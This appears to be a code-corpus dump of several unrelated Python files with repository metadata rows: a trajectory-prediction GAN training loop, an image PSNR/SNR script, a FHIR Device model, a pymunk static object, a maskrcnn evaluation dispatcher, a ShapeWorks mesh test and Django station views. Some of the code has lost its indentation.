nn.init.kaiming_normal_(m.weight)
def get_dtypes(args):
long_dtype = torch.LongTensor
float_dtype = torch.FloatTensor
if args.use_gpu == 1:
long_dtype = torch.cuda.LongTensor
float_dtype = torch.cuda.FloatTensor
return long_dtype, float_dtype
def main(args):
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_num
train_path = get_dset_path(args.dataset_name, 'train')
val_path = get_dset_path(args.dataset_name, 'val')
long_dtype, float_dtype = get_dtypes(args)
logger.info("Initializing train dataset")
train_dset, train_loader = data_loader(args, train_path)
logger.info("Initializing val dataset")
_, val_loader = data_loader(args, val_path)
iterations_per_epoch = len(train_dset) / args.batch_size / args.d_steps
if args.num_epochs:
args.num_iterations = int(iterations_per_epoch * args.num_epochs)
logger.info(
'There are {} iterations per epoch'.format(iterations_per_epoch)
)
generator = TrajectoryGenerator(
obs_len=args.obs_len,
pred_len=args.pred_len,
embedding_dim=args.embedding_dim,
encoder_h_dim=args.encoder_h_dim_g,
decoder_h_dim=args.decoder_h_dim_g,
mlp_dim=args.mlp_dim,
num_layers=args.num_layers,
noise_dim=args.noise_dim,
noise_type=args.noise_type,
noise_mix_type=args.noise_mix_type,
pooling_type=args.pooling_type,
pool_every_timestep=args.pool_every_timestep,
dropout=args.dropout,
bottleneck_dim=args.bottleneck_dim,
neighborhood_size=args.neighborhood_size,
grid_size=args.grid_size,
batch_norm=args.batch_norm)
generator.apply(init_weights)
generator.type(float_dtype).train()
logger.info('Here is the generator:')
logger.info(generator)
discriminator = TrajectoryDiscriminator(
obs_len=args.obs_len,
pred_len=args.pred_len,
embedding_dim=args.embedding_dim,
h_dim=args.encoder_h_dim_d,
mlp_dim=args.mlp_dim,
num_layers=args.num_layers,
dropout=args.dropout,
batch_norm=args.batch_norm,
d_type=args.d_type)
discriminator.apply(init_weights)
discriminator.type(float_dtype).train()
logger.info('Here is the discriminator:')
logger.info(discriminator)
g_loss_fn = gan_g_loss
d_loss_fn = gan_d_loss
optimizer_g = optim.Adam(generator.parameters(), lr=args.g_learning_rate)
optimizer_d = optim.Adam(
discriminator.parameters(), lr=args.d_learning_rate
)
restore_path = None
if args.checkpoint_start_from is not None:
restore_path = args.checkpoint_start_from
elif args.restore_from_checkpoint == 1:
restore_path = os.path.join(args.output_dir,
'%s_with_model.pt' % args.checkpoint_name)
if restore_path is not None and os.path.isfile(restore_path):
logger.info('Restoring from checkpoint {}'.format(restore_path))
checkpoint = torch.load(restore_path)
generator.load_state_dict(checkpoint['g_state'])
discriminator.load_state_dict(checkpoint['d_state'])
optimizer_g.load_state_dict(checkpoint['g_optim_state'])
optimizer_d.load_state_dict(checkpoint['d_optim_state'])
t = checkpoint['counters']['t']
epoch = checkpoint['counters']['epoch']
checkpoint['restore_ts'].append(t)
else:
t, epoch = 0, 0
checkpoint = {
'args': args.__dict__,
'G_losses': defaultdict(list),
'D_losses': defaultdict(list),
'losses_ts': [],
'metrics_val': defaultdict(list),
'metrics_train': defaultdict(list),
'sample_ts': [],
'restore_ts': [],
'norm_g': [],
'norm_d': [],
'counters': {
't': None,
'epoch': None,
},
'g_state': None,
'g_optim_state': None,
'd_state': None,
'd_optim_state': None,
'g_best_state': None,
'd_best_state': None,
'best_t': None,
'g_best_nl_state': None,
'd_best_state_nl': None,
'best_t_nl': None,
}
t0 = None
while t < args.num_iterations:
gc.collect()
d_steps_left = args.d_steps
g_steps_left = args.g_steps
epoch += 1
logger.info('Starting epoch {}'.format(epoch))
for batch in train_loader:
if args.timing == 1:
torch.cuda.synchronize()
t1 = time.time()
if d_steps_left > 0:
step_type = 'd'
losses_d = discriminator_step(args, batch, generator,
discriminator, d_loss_fn,
optimizer_d)
checkpoint['norm_d'].append(
get_total_norm(discriminator.parameters()))
d_steps_left -= 1
elif g_steps_left > 0:
step_type = 'g'
losses_g = generator_step(args, batch, generator,
discriminator, g_loss_fn,
optimizer_g)
checkpoint['norm_g'].append(
get_total_norm(generator.parameters())
)
g_steps_left -= 1
if args.timing == 1:
torch.cuda.synchronize()
t2 = time.time()
logger.info('{} step took {}'.format(step_type, t2 - t1))
if d_steps_left > 0 or g_steps_left > 0:
continue
if args.timing == 1:
if t0 is not None:
                    logger.info('Iteration {} took {}'.format(
t - 1, time.time() - t0
))
t0 = time.time()
if t % args.print_every == 0:
logger.info('t = {} / {}'.format(t + 1, args.num_iterations))
for k, v in sorted(losses_d.items()):
logger.info(' [D] {}: {:.3f}'.format(k, v))
checkpoint['D_losses'][k].append(v)
for k, v in sorted(losses_g.items()):
logger.info(' [G] {}: {:.3f}'.format(k, v))
checkpoint['G_losses'][k].append(v)
checkpoint['losses_ts'].append(t)
if t > 0 and t % args.checkpoint_every == 0:
checkpoint['counters']['t'] = t
checkpoint['counters']['epoch'] = epoch
checkpoint['sample_ts'].append(t)
logger.info('Checking stats on val ...')
metrics_val = check_accuracy(
args, val_loader, generator, discriminator, d_loss_fn
)
logger.info('Checking stats on train ...')
metrics_train = check_accuracy(
args, train_loader, generator, discriminator,
d_loss_fn, limit=True
)
for k, v in sorted(metrics_val.items()):
logger.info(' [val] {}: {:.3f}'.format(k, v))
checkpoint['metrics_val'][k].append(v)
for k, v in sorted(metrics_train.items()):
logger.info(' [train] {}: {:.3f}'.format(k, v))
checkpoint['metrics_train'][k].append(v)
min_ade = min(checkpoint['metrics_val']['ade'])
min_ade_nl = min(checkpoint['metrics_val']['ade_nl'])
if metrics_val['ade'] == min_ade:
logger.info('New low for avg_disp_error')
checkpoint['best_t'] = t
checkpoint['g_best_state'] = generator.state_dict()
checkpoint['d_best_state'] = discriminator.state_dict()
if metrics_val['ade_nl'] == min_ade_nl:
logger.info('New low for avg_disp_error_nl')
checkpoint['best_t_nl'] = t
checkpoint['g_best_nl_state'] = generator.state_dict()
checkpoint['d_best_nl_state'] = discriminator.state_dict()
checkpoint['g_state'] = generator.state_dict()
checkpoint['g_optim_state'] = optimizer_g.state_dict()
checkpoint['d_state'] = discriminator.state_dict()
checkpoint['d_optim_state'] = optimizer_d.state_dict()
checkpoint_path = os.path.join(
args.output_dir, '%s_with_model.pt' % args.checkpoint_name
)
logger.info('Saving checkpoint to {}'.format(checkpoint_path))
torch.save(checkpoint, checkpoint_path)
logger.info('Done.')
checkpoint_path = os.path.join(
args.output_dir, '%s_no_model.pt' % args.checkpoint_name)
logger.info('Saving checkpoint to {}'.format(checkpoint_path))
key_blacklist = [
'g_state', 'd_state', 'g_best_state', 'g_best_nl_state',
'g_optim_state', 'd_optim_state', 'd_best_state',
'd_best_nl_state'
]
small_checkpoint = {}
for k, v in checkpoint.items():
if k not in key_blacklist:
small_checkpoint[k] = v
torch.save(small_checkpoint, checkpoint_path)
logger.info('Done.')
t += 1
d_steps_left = args.d_steps
g_steps_left = args.g_steps
if t >= args.num_iterations:
break
def discriminator_step(
args, batch, generator, discriminator, d_loss_fn, optimizer_d
):
batch = [tensor.cuda() for tensor in batch]
(obs_traj, pred_traj_gt, obs_traj_rel, pred_traj_gt_rel, non_linear_ped,
loss_mask, seq_start_end) = batch
losses = {}
loss = torch.zeros(1).to(pred_traj_gt)
generator_out = generator(obs_traj, obs_traj_rel, seq_start_end)
pred_traj_fake_rel = generator_out
pred_traj_fake = relative_to_abs(pred_traj_fake_rel, obs_traj[-1])
traj_real = torch.cat([obs_traj, pred_traj_gt], dim=0)
traj_real_rel = torch.cat([obs_traj_rel, pred_traj_gt_rel], dim=0)
traj_fake = torch.cat([obs_traj, pred_traj_fake], dim=0)
traj_fake_rel = torch.cat([obs_traj_rel, pred_traj_fake_rel], dim=0)
scores_fake = discriminator(traj_fake, traj_fake_rel, seq_start_end)
scores_real = discriminator(traj_real, traj_real_rel, seq_start_end)
data_loss = d_loss_fn(scores_real, scores_fake)
losses['D_data_loss'] = data_loss.item()
loss += data_loss
losses['D_total_loss'] = loss.item()
optimizer_d.zero_grad()
loss.backward()
if args.clipping_threshold_d > 0:
nn.utils.clip_grad_norm_(discriminator.parameters(),
args.clipping_threshold_d)
optimizer_d.step()
return losses
def generator_step(
args, batch, generator, discriminator, g_loss_fn, optimizer_g
):
batch = [tensor.cuda() for tensor in batch]
(obs_traj, pred_traj_gt, obs_traj_rel, pred_traj_gt_rel, non_linear_ped,
loss_mask, seq_start_end) = batch
losses = {}
loss = torch.zeros(1).to(pred_traj_gt)
g_l2_loss_rel = []
loss_mask = loss_mask[:, args.obs_len:]
for _ in range(args.best_k):
generator_out = generator(obs_traj, obs_traj_rel, seq_start_end)
pred_traj_fake_rel = generator_out
pred_traj_fake = relative_to_abs(pred_traj_fake_rel, obs_traj[-1])
if args.l2_loss_weight > 0:
g_l2_loss_rel.append(args.l2_loss_weight * l2_loss(
pred_traj_fake_rel,
pred_traj_gt_rel,
loss_mask,
mode='raw'))
g_l2_loss_sum_rel = torch.zeros(1).to(pred_traj_gt)
if args.l2_loss_weight > 0:
g_l2_loss_rel = torch.stack(g_l2_loss_rel, dim=1)
for start, end in seq_start_end.data:
_g_l2_loss_rel = g_l2_loss_rel[start:end]
_g_l2_loss_rel = torch.sum(_g_l2_loss_rel, dim=0)
_g_l2_loss_rel = torch.min(_g_l2_loss_rel) / torch.sum(
loss_mask[start:end])
g_l2_loss_sum_rel += _g_l2_loss_rel
losses['G_l2_loss_rel'] = g_l2_loss_sum_rel.item()
loss += g_l2_loss_sum_rel
traj_fake = torch.cat([obs_traj, pred_traj_fake], dim=0)
traj_fake_rel = torch.cat([obs_traj_rel, pred_traj_fake_rel], dim=0)
scores_fake = discriminator(traj_fake, traj_fake_rel, seq_start_end)
discriminator_loss = g_loss_fn(scores_fake)
loss += discriminator_loss
losses['G_discriminator_loss'] = discriminator_loss.item()
losses['G_total_loss'] = loss.item()
optimizer_g.zero_grad()
loss.backward()
if args.clipping_threshold_g > 0:
nn.utils.clip_grad_norm_(
generator.parameters(), args.clipping_threshold_g
)
optimizer_g.step()
return losses
def check_accuracy(
args, loader, generator, discriminator, d_loss_fn, limit=False
):
d_losses = []
metrics = {}
    g_l2_losses_abs, g_l2_losses_rel = [], []
    disp_error, disp_error_l, disp_error_nl = [], [], []
    f_disp_error, f_disp_error_l, f_disp_error_nl = [], [], []
total_traj, total_traj_l, total_traj_nl = 0, 0, 0
loss_mask_sum = 0
generator.eval()
with torch.no_grad():
for batch in loader:
batch = [tensor.cuda() for tensor in batch]
(obs_traj, pred_traj_gt, obs_traj_rel, pred_traj_gt_rel,
non_linear_ped, loss_mask, seq_start_end) = batch
linear_ped = 1 - non_linear_ped
loss_mask = loss_mask[:, args.obs_len:]
pred_traj_fake_rel = generator(
obs_traj, obs_traj_rel, seq_start_end
)
pred_traj_fake = relative_to_abs(pred_traj_fake_rel, obs_traj[-1])
g_l2_loss_abs, g_l2_loss_rel = cal_l2_losses(
pred_traj_gt, pred_traj_gt_rel, pred_traj_fake,
pred_traj_fake_rel, loss_mask
)
ade, ade_l, ade_nl = cal_ade(
pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped
)
fde, fde_l, fde_nl = cal_fde(
pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped
)
traj_real = torch.cat([obs_traj, pred_traj_gt], dim=0)
traj_real_rel = torch.cat([obs_traj_rel, pred_traj_gt_rel], dim=0)
traj_fake = torch.cat([obs_traj, pred_traj_fake], dim=0)
traj_fake_rel = torch.cat([obs_traj_rel, pred_traj_fake_rel], dim=0)
scores_fake = discriminator(traj_fake, traj_fake_rel, seq_start_end)
scores_real = discriminator(traj_real, traj_real_rel, seq_start_end)
d_loss = d_loss_fn(scores_real, scores_fake)
d_losses.append(d_loss.item())
g_l2_losses_abs.append(g_l2_loss_abs.item())
g_l2_losses_rel.append(g_l2_loss_rel.item())
disp_error.append(ade.item())
disp_error_l.append(ade_l.item())
disp_error_nl.append(ade_nl.item())
f_disp_error.append(fde.item())
f_disp_error_l.append(fde_l.item())
f_disp_error_nl.append(fde_nl.item())
loss_mask_sum += torch.numel(loss_mask.data)
total_traj += pred_traj_gt.size(1)
total_traj_l += torch.sum(linear_ped).item()
total_traj_nl += torch.sum(non_linear_ped).item()
if limit and total_traj >= args.num_samples_check:
break
metrics['d_loss'] = sum(d_losses) / len(d_losses)
metrics['g_l2_loss_abs'] = sum(g_l2_losses_abs) / loss_mask_sum
metrics['g_l2_loss_rel'] = sum(g_l2_losses_rel) / loss_mask_sum
metrics['ade'] = sum(disp_error) / (total_traj * args.pred_len)
metrics['fde'] = sum(f_disp_error) / total_traj
if total_traj_l != 0:
metrics['ade_l'] = sum(disp_error_l) / (total_traj_l * args.pred_len)
metrics['fde_l'] = sum(f_disp_error_l) / total_traj_l
else:
metrics['ade_l'] = 0
metrics['fde_l'] = 0
if total_traj_nl != 0:
metrics['ade_nl'] = sum(disp_error_nl) / (
total_traj_nl * args.pred_len)
metrics['fde_nl'] = sum(f_disp_error_nl) / total_traj_nl
else:
metrics['ade_nl'] = 0
metrics['fde_nl'] = 0
generator.train()
return metrics
def cal_l2_losses(
pred_traj_gt, pred_traj_gt_rel, pred_traj_fake, pred_traj_fake_rel,
loss_mask
):
g_l2_loss_abs = l2_loss(
pred_traj_fake, pred_traj_gt, loss_mask, mode='sum'
)
g_l2_loss_rel = l2_loss(
pred_traj_fake_rel, pred_traj_gt_rel, loss_mask, mode='sum'
)
return g_l2_loss_abs, g_l2_loss_rel
def cal_ade(pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped):
ade = displacement_error(pred_traj_fake, pred_traj_gt)
ade_l = displacement_error(pred_traj_fake, pred_traj_gt, linear_ped)
ade_nl = displacement_error(pred_traj_fake, pred_traj_gt, non_linear_ped)
return ade, ade_l, ade_nl
def cal_fde(
pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped
):
fde = final_displacement_error(pred_traj_fake[-1], pred_traj_gt[-1])
fde_l = final_displacement_error(
pred_traj_fake[-1], pred_traj_gt[-1], linear_ped
)
fde_nl = final_displacement_error(
pred_traj_fake[-1], pred_traj_gt[-1], non_linear_ped
)
return fde, fde_l, fde_nl
if __name__ == '__main__':
args = parser.parse_args()
main(args)
| true
| true
|
1c4933fa5c3c74bc7f7cab569a7ff8836860a861
| 816
|
py
|
Python
|
CompressionCheck.py
|
BryanYehuda/CompressionMethodComparison
|
79db365b46242e49116f92bb871545c0fce26635
|
[
"MIT"
] | 1
|
2021-06-11T13:19:11.000Z
|
2021-06-11T13:19:11.000Z
|
CompressionCheck.py
|
BryanYehuda/CompressionMethodComparison
|
79db365b46242e49116f92bb871545c0fce26635
|
[
"MIT"
] | null | null | null |
CompressionCheck.py
|
BryanYehuda/CompressionMethodComparison
|
79db365b46242e49116f92bb871545c0fce26635
|
[
"MIT"
] | null | null | null |
from math import log10, sqrt
import cv2
import numpy as np
def PSNR(original, compressed):
    # Cast to float first: uint8 subtraction would wrap around on negatives
    mse = np.mean((original.astype(np.float64) - compressed.astype(np.float64)) ** 2)
if(mse == 0):
return 100
max_pixel = 255.0
psnr = 20 * log10(max_pixel / sqrt(mse))
return psnr
def SNR(original, compressed):
    mse = np.mean((original.astype(np.float64) - compressed.astype(np.float64)) ** 2)
if(mse == 0):
return 100
snr = 20 * log10(np.mean(original) / sqrt(mse))
return snr
def main():
original = cv2.imread("raw.png")
compressed = cv2.imread("lossy.png", 1)
    mse = np.mean((original.astype(np.float64) - compressed.astype(np.float64)) ** 2)
snr = SNR(original, compressed)
psnr = PSNR(original, compressed)
print(f"MSE value is {mse}")
print(f"SNR value is {snr} dB")
print(f"PSNR value is {psnr} dB")
if __name__ == "__main__":
main()
| 26.322581
| 51
| 0.604167
|
from math import log10, sqrt
import cv2
import numpy as np
def PSNR(original, compressed):
    mse = np.mean((original.astype(np.float64) - compressed.astype(np.float64)) ** 2)
if(mse == 0):
return 100
max_pixel = 255.0
psnr = 20 * log10(max_pixel / sqrt(mse))
return psnr
def SNR(original, compressed):
    mse = np.mean((original.astype(np.float64) - compressed.astype(np.float64)) ** 2)
if(mse == 0):
return 100
snr = 20 * log10(np.mean(original) / sqrt(mse))
return snr
def main():
original = cv2.imread("raw.png")
compressed = cv2.imread("lossy.png", 1)
    mse = np.mean((original.astype(np.float64) - compressed.astype(np.float64)) ** 2)
snr = SNR(original, compressed)
psnr = PSNR(original, compressed)
print(f"MSE value is {mse}")
print(f"SNR value is {snr} dB")
print(f"PSNR value is {psnr} dB")
if __name__ == "__main__":
main()
| true
| true
|
1c49346a3a2d0de5170f4908b321fa9da8a9a573
| 5,190
|
py
|
Python
|
fhir/resources/DSTU2/device.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
fhir/resources/DSTU2/device.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
fhir/resources/DSTU2/device.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 1.0.2.7202 (http://hl7.org/fhir/StructureDefinition/Device) on 2019-05-14.
# 2019, SMART Health IT.
from . import (annotation, codeableconcept, contactpoint, domainresource,
fhirdate, fhirreference, identifier)
class Device(domainresource.DomainResource):
""" An instance of a manufactured te that is used in the provision of
healthcare.
This resource identifies an instance of a manufactured item that is used in
the provision of healthcare without being substantially changed through
that activity. The device may be a medical or non-medical device. Medical
devices includes durable (reusable) medical equipment, implantable devices,
as well as disposable equipment used for diagnostic, treatment, and
research for healthcare and public health. Non-medical devices may include
items such as a machine, cellphone, computer, application, etc.
"""
resource_name = "Device"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.contact = None
""" Details for human/organization for support.
List of `ContactPoint` items (represented as `dict` in JSON). """
self.expiry = None
""" Date and time of expiry of this device (if applicable).
Type `FHIRDate` (represented as `str` in JSON). """
self.identifier = None
""" Instance id from manufacturer, owner, and others.
List of `Identifier` items (represented as `dict` in JSON). """
self.location = None
""" Where the resource is found.
Type `FHIRReference` referencing `Location` (represented as `dict` in JSON). """
self.lotNumber = None
""" Lot number of manufacture.
Type `str`. """
self.manufactureDate = None
""" Manufacture date.
Type `FHIRDate` (represented as `str` in JSON). """
self.manufacturer = None
""" Name of device manufacturer.
Type `str`. """
self.model = None
""" Model id assigned by the manufacturer.
Type `str`. """
self.note = None
""" Device notes and comments.
List of `Annotation` items (represented as `dict` in JSON). """
self.owner = None
""" Organization responsible for device.
Type `FHIRReference` referencing `Organization` (represented as `dict` in JSON). """
self.patient = None
""" If the resource is affixed to a person.
Type `FHIRReference` referencing `Patient` (represented as `dict` in JSON). """
self.status = None
""" available | not-available | entered-in-error.
Type `str`. """
self.type = None
""" What kind of device this is.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.udi = None
""" FDA mandated Unique Device Identifier.
Type `str`. """
self.url = None
""" Network address to contact device.
Type `str`. """
self.version = None
""" Version number (i.e. software).
Type `str`. """
super(Device, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(Device, self).elementProperties()
js.extend(
[
("contact", "contact", contactpoint.ContactPoint, True, None, False),
("expiry", "expiry", fhirdate.FHIRDate, False, None, False),
("identifier", "identifier", identifier.Identifier, True, None, False),
(
"location",
"location",
fhirreference.FHIRReference,
False,
None,
False,
),
("lotNumber", "lotNumber", str, False, None, False),
(
"manufactureDate",
"manufactureDate",
fhirdate.FHIRDate,
False,
None,
False,
),
("manufacturer", "manufacturer", str, False, None, False),
("model", "model", str, False, None, False),
("note", "note", annotation.Annotation, True, None, False),
("owner", "owner", fhirreference.FHIRReference, False, None, False),
("patient", "patient", fhirreference.FHIRReference, False, None, False),
("status", "status", str, False, None, False),
("type", "type", codeableconcept.CodeableConcept, False, None, True),
("udi", "udi", str, False, None, False),
("url", "url", str, False, None, False),
("version", "version", str, False, None, False),
]
)
return js
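# --- Editor's sketch (illustration only) ---
# Minimal round-trip through the generated class; the field values are made
# up, and as_json() comes from the FHIRAbstractBase layer this resource
# ultimately inherits from:
def _device_usage_sketch():
    device = Device({
        "resourceType": "Device",
        "status": "available",
        "type": {"text": "thermometer"},  # `type` is the only required field
        "manufacturer": "Acme",
    })
    assert device.manufacturer == "Acme"
    return device.as_json()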
| 37.608696
| 97
| 0.570328
|
from . import (annotation, codeableconcept, contactpoint, domainresource,
fhirdate, fhirreference, identifier)
class Device(domainresource.DomainResource):
resource_name = "Device"
def __init__(self, jsondict=None, strict=True):
self.contact = None
self.expiry = None
self.identifier = None
self.location = None
self.lotNumber = None
self.manufactureDate = None
self.manufacturer = None
self.model = None
self.note = None
self.owner = None
self.patient = None
self.status = None
self.type = None
self.udi = None
self.url = None
self.version = None
super(Device, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(Device, self).elementProperties()
js.extend(
[
("contact", "contact", contactpoint.ContactPoint, True, None, False),
("expiry", "expiry", fhirdate.FHIRDate, False, None, False),
("identifier", "identifier", identifier.Identifier, True, None, False),
(
"location",
"location",
fhirreference.FHIRReference,
False,
None,
False,
),
("lotNumber", "lotNumber", str, False, None, False),
(
"manufactureDate",
"manufactureDate",
fhirdate.FHIRDate,
False,
None,
False,
),
("manufacturer", "manufacturer", str, False, None, False),
("model", "model", str, False, None, False),
("note", "note", annotation.Annotation, True, None, False),
("owner", "owner", fhirreference.FHIRReference, False, None, False),
("patient", "patient", fhirreference.FHIRReference, False, None, False),
("status", "status", str, False, None, False),
("type", "type", codeableconcept.CodeableConcept, False, None, True),
("udi", "udi", str, False, None, False),
("url", "url", str, False, None, False),
("version", "version", str, False, None, False),
]
)
return js
| true
| true
|
1c4934d3e8034238ab0748a557fef674ad99a5a3
| 235
|
py
|
Python
|
create_game/tools/fixed_obj.py
|
clvrai/create
|
8d180cbdca01f4561655b889e82325a387afbeb6
|
[
"MIT"
] | 11
|
2019-12-04T07:41:47.000Z
|
2021-11-09T01:06:23.000Z
|
create_game/tools/fixed_obj.py
|
clvrai/create
|
8d180cbdca01f4561655b889e82325a387afbeb6
|
[
"MIT"
] | 2
|
2021-05-18T15:40:50.000Z
|
2021-09-08T02:19:32.000Z
|
create_game/tools/fixed_obj.py
|
clvrai/create
|
8d180cbdca01f4561655b889e82325a387afbeb6
|
[
"MIT"
] | null | null | null |
from .basic_obj import BasicObj
from pymunk import Body
class FixedObj(BasicObj):
def __init__(self, pos):
super().__init__(pos)
def _create_body(self, mass, inertia):
return Body(mass, inertia, Body.STATIC)
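# --- Editor's note (illustration only) ---
# A pymunk body created with Body.STATIC is pinned in place: the space never
# integrates its velocity, so mass and inertia are effectively ignored.
# Equivalent standalone construction, for reference:
#
#   from pymunk import Body
#   b = Body(body_type=Body.STATIC)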
| 21.363636
| 47
| 0.693617
|
from .basic_obj import BasicObj
from pymunk import Body
class FixedObj(BasicObj):
def __init__(self, pos):
super().__init__(pos)
def _create_body(self, mass, inertia):
return Body(mass, inertia, Body.STATIC)
| true
| true
|
1c4934fde3364c912b12331800694316ba35f6c8
| 1,093
|
py
|
Python
|
maskrcnn_benchmark/data/datasets/evaluation/__init__.py
|
ashnair1/rotated_maskrcnn
|
c7208930ee361d32e98ad296bb5861e432dc6198
|
[
"MIT"
] | null | null | null |
maskrcnn_benchmark/data/datasets/evaluation/__init__.py
|
ashnair1/rotated_maskrcnn
|
c7208930ee361d32e98ad296bb5861e432dc6198
|
[
"MIT"
] | null | null | null |
maskrcnn_benchmark/data/datasets/evaluation/__init__.py
|
ashnair1/rotated_maskrcnn
|
c7208930ee361d32e98ad296bb5861e432dc6198
|
[
"MIT"
] | null | null | null |
from maskrcnn_benchmark.data import datasets
from .coco import coco_evaluation
from .voc import voc_evaluation
def evaluate(dataset, predictions, output_folder, **kwargs):
"""evaluate dataset using different methods based on dataset type.
Args:
dataset: Dataset object
predictions(list[BoxList]): each item in the list represents the
prediction results for one image.
output_folder: output folder, to save evaluation files or results.
**kwargs: other args.
Returns:
evaluation result
"""
args = dict(
dataset=dataset, predictions=predictions, output_folder=output_folder, **kwargs
)
if isinstance(dataset, datasets.COCODataset):
return coco_evaluation(**args)
elif isinstance(dataset, datasets.PascalVOCDataset):
return voc_evaluation(**args)
elif isinstance(dataset, datasets.iSAIDDataset):
return coco_evaluation(**args)
else:
dataset_name = dataset.__class__.__name__
raise NotImplementedError("Unsupported dataset type {}.".format(dataset_name))
| 36.433333
| 87
| 0.707228
|
from maskrcnn_benchmark.data import datasets
from .coco import coco_evaluation
from .voc import voc_evaluation
def evaluate(dataset, predictions, output_folder, **kwargs):
args = dict(
dataset=dataset, predictions=predictions, output_folder=output_folder, **kwargs
)
if isinstance(dataset, datasets.COCODataset):
return coco_evaluation(**args)
elif isinstance(dataset, datasets.PascalVOCDataset):
return voc_evaluation(**args)
elif isinstance(dataset, datasets.iSAIDDataset):
return coco_evaluation(**args)
else:
dataset_name = dataset.__class__.__name__
raise NotImplementedError("Unsupported dataset type {}.".format(dataset_name))
| true
| true
|
1c4935bed79fa1bba5b0b91761631a377901a072
| 342
|
py
|
Python
|
Testing/PythonTests/probeVolume.py
|
danlamanna/ShapeWorks
|
58ffac86cbea1e7f0b4ede9ff6ded167bd5dfc14
|
[
"MIT"
] | null | null | null |
Testing/PythonTests/probeVolume.py
|
danlamanna/ShapeWorks
|
58ffac86cbea1e7f0b4ede9ff6ded167bd5dfc14
|
[
"MIT"
] | null | null | null |
Testing/PythonTests/probeVolume.py
|
danlamanna/ShapeWorks
|
58ffac86cbea1e7f0b4ede9ff6ded167bd5dfc14
|
[
"MIT"
] | null | null | null |
import os
import sys
from shapeworks import *
def probeVolumeTest():
mesh = Mesh(os.environ["DATA"] + "/femur.vtk")
img = Image(os.environ["DATA"] + "/femurVtkDT.nrrd")
mesh.probeVolume(img)
compareMesh = Mesh(os.environ["DATA"] + "/probe.vtk")
return mesh == compareMesh
val = probeVolumeTest()
if val is False:
sys.exit(1)
| 19
| 55
| 0.678363
|
import os
import sys
from shapeworks import *
def probeVolumeTest():
mesh = Mesh(os.environ["DATA"] + "/femur.vtk")
img = Image(os.environ["DATA"] + "/femurVtkDT.nrrd")
mesh.probeVolume(img)
compareMesh = Mesh(os.environ["DATA"] + "/probe.vtk")
return mesh == compareMesh
val = probeVolumeTest()
if val is False:
sys.exit(1)
| true
| true
|
1c4936d5138483813b170c41446e09327d1b11f7
| 11,544
|
py
|
Python
|
applications/station/views.py
|
awwong1/apollo
|
5571b5f222265bec3eed45b21e862636ccdc9a97
|
[
"MIT"
] | null | null | null |
applications/station/views.py
|
awwong1/apollo
|
5571b5f222265bec3eed45b21e862636ccdc9a97
|
[
"MIT"
] | null | null | null |
applications/station/views.py
|
awwong1/apollo
|
5571b5f222265bec3eed45b21e862636ccdc9a97
|
[
"MIT"
] | null | null | null |
from apollo.choices import CHARGE_LIST_OPEN
from apollo.viewmixins import LoginRequiredMixin, ActivitySendMixin, StaffRequiredMixin
from applications.business.models import Business
from applications.charge_list.forms import ActivityChargeCatalog, TimeChargeCatalog, UnitChargeCatalog
from applications.charge_list.models import ChargeList
from applications.station.forms import StationBusinessForm, StationRentalForm
from applications.station.models import Station, StationBusiness, StationRental
from django.contrib import messages
from django.contrib.messages.views import SuccessMessageMixin
from django.core.urlresolvers import reverse_lazy
from django.shortcuts import get_object_or_404, redirect
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView
def StationUUIDRedirect(request, station_uuid=None):
"""
Given a station guid, redirect to the station detail page.
If the station does not exist with the specified parameters, throw a 404 exception.
"""
station = get_object_or_404(Station, uuid=station_uuid)
return redirect('station_detail', kwargs={'pk': station.pk})
"""
Station model generic views.
"""
class StationViewList(LoginRequiredMixin, ListView):
context_object_name = "stations"
model = Station
template_name = "station/station_list.html"
def get_context_data(self, **kwargs):
context = super(StationViewList, self).get_context_data(**kwargs)
return context
class StationViewDetail(LoginRequiredMixin, DetailView):
context_object_name = 'station'
model = Station
template_name = "station/station_detail.html"
def get_context_data(self, **kwargs):
context = super(StationViewDetail, self).get_context_data(**kwargs)
user_businesses = Business.objects.filter(businessmembership__user=self.request.user)
station_businesses = self.object.stationbusiness_set.all()
context['can_modify'] = len(station_businesses.filter(business__in=user_businesses)) >= 1
active_cl = ChargeList.objects.filter(station=self.object, status=CHARGE_LIST_OPEN)
if len(active_cl) == 1:
context['chargelist'] = active_cl[0]
price_list_pk = active_cl[0].price_list.pk
context['activitycharge_catalog'] = ActivityChargeCatalog(price_list_pk=price_list_pk)
context['timecharge_catalog'] = TimeChargeCatalog(price_list_pk=price_list_pk)
context['unitcharge_catalog'] = UnitChargeCatalog(price_list_pk=price_list_pk)
return context
class StationViewCreate(LoginRequiredMixin, SuccessMessageMixin, ActivitySendMixin, CreateView):
context_object_name = 'station'
model = Station
success_message = "%(name)s was created successfully!"
template_name = "station/station_form.html"
activity_verb = 'created station'
fields = "__all__"
def dispatch(self, *args, **kwargs):
business = get_object_or_404(Business, pk=self.kwargs.get('business_pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = user_businesses.filter(business=business)
if can_modify:
return super(StationViewCreate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to create a station for this business.")
return redirect('business_detail', pk=business.pk)
def get_success_url(self):
business = get_object_or_404(Business, pk=self.kwargs.get('business_pk', '-1'))
StationBusiness.objects.create(business=business, station=self.object)
return reverse_lazy('station_detail', kwargs={'pk': self.object.pk})
def get_context_data(self, **kwargs):
context = super(StationViewCreate, self).get_context_data(**kwargs)
context['action'] = "Create New"
return context
